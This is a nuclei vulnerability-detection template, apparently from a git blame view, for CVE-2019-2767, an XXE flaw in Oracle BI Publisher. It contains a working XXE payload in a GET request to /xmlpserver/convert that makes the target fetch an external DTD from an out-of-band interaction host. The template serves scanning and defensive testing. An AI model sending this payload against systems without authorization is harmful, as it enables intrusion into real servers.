nuclei-templates/cves/2019/CVE-2019-2767.yaml

29 lines
1.2 KiB
YAML
Raw Normal View History

2021-06-08 16:19:35 +00:00
id: CVE-2019-2767
info:
2021-06-08 19:53:13 +00:00
name: Oracle Business Intelligence - Publisher XXE
2021-06-08 16:19:35 +00:00
author: madrobot
severity: high
description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2019-2767
tags: cve,cve2019,oracle,xxe,oast
2021-06-08 16:19:35 +00:00
requests:
2021-06-08 16:22:58 +00:00
- raw:
- |
2021-06-08 16:29:59 +00:00
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
2021-06-08 16:22:58 +00:00
Host: {{Hostname}}
2021-06-08 16:19:35 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
2021-06-08 16:19:35 +00:00
words:
- "http"